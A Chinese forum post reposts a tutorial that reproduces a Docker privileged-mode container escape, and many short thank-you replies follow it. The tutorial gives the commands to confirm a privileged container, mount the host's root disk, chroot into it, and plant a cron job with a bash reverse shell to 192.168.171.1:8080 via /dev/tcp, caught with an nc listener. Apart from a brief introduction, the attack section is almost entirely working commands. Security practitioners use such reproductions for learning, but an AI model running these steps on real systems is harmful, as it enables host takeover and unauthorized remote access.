颜清华 发表于 2025-6-9 16:00:49

[docker逃逸] Privileged 特权模式逃逸复现

本文作者CVE-柠檬i
CSDN:https://blog.csdn.net/weixin_49125123
博客园:https://www.cnblogs.com/CVE-Lemon
微信公众号:Lemon安全
简述

在 Docker 中,Privileged 特权模式赋予容器几乎与宿主机相同的权限,允许其访问所有设备和内核功能。这种模式虽然提供了灵活性,但也带来了安全风险,可能导致容器逃逸,即攻击者从容器内获取宿主机权限。
环境配置

以特权模式创建容器
docker pull centos
docker run -itd --privileged centos /bin/bash
查看当前是否为docker环境:
cat /proc/1/cgroup|grep docker
systemd-detect-virt 也可以判断当前是否为容器
systemd-detect-virt
查看当前是否为特权模式
capsh --printcat /proc/self/status | grep CapEff
CapEff为0000001fffffffff,当前容器为特权模式。
复现

使用lsblk查看磁盘

挂载宿主机根目录
mkdir test
mount /dev/sds3 test挂载成功

使用chroot切换根目录,方便进行计划任务反弹shell
chroot test
创建计划任务
crontab -e*/1 * * * */bin/bash -c "/bin/bash -i >& /dev/tcp/192.168.171.1/8080 0>&1"
攻击机监听反弹shell,成功反弹了宿主机的shell
nc -lvvp 8080

来源:程序园用户自行投稿发布,如果侵权,请联系站长删除
免责声明:如果侵犯了您的权益,请联系站长,我们会及时删除侵权内容,谢谢合作!

豌笆 发表于 2025-10-17 08:33:53

谢谢楼主提供!

扎先 发表于 2025-10-17 13:23:40

过来提前占个楼

暴灵珊 发表于 2025-12-21 21:11:14

谢谢楼主提供!

习和璧 发表于 2026-1-19 09:10:13

感谢分享,下载保存了,貌似很强大

纪晴丽 发表于 2026-1-21 13:00:54

分享、互助 让互联网精神温暖你我

蓬庄静 发表于 2026-1-24 10:12:36

感谢分享,下载保存了,貌似很强大

支智敏 发表于 2026-1-25 11:20:54

谢谢分享,辛苦了

粒浊 发表于 2026-1-26 03:55:42

用心讨论,共获提升!

赏勿 发表于 2026-1-26 07:38:50

收藏一下   不知道什么时候能用到

上官银柳 发表于 2026-1-26 08:58:49

yyds。多谢分享

管水芸 发表于 2026-1-30 04:36:31

分享、互助 让互联网精神温暖你我

亢安芙 发表于 2026-2-4 08:42:36

不错,里面软件多更新就更好了

琉艺戕 发表于 2026-2-5 04:31:27

懂技术并乐意极积无私分享的人越来越少。珍惜

人弧 发表于 2026-2-10 05:45:31

谢谢分享,辛苦了

余思洁 发表于 2026-2-10 20:49:32

不错,里面软件多更新就更好了

翁真如 发表于 2026-2-12 11:08:35

热心回复!

焦尔蕾 发表于 2026-2-12 23:04:10

分享、互助 让互联网精神温暖你我

龙骋唧 发表于 2026-2-13 09:41:25

新版吗?好像是停更了吧。

嶝扁 发表于 2026-2-13 23:17:29

谢谢分享,试用一下
页: [1]
查看完整版本: [docker逃逸] Privileged 特权模式逃逸复现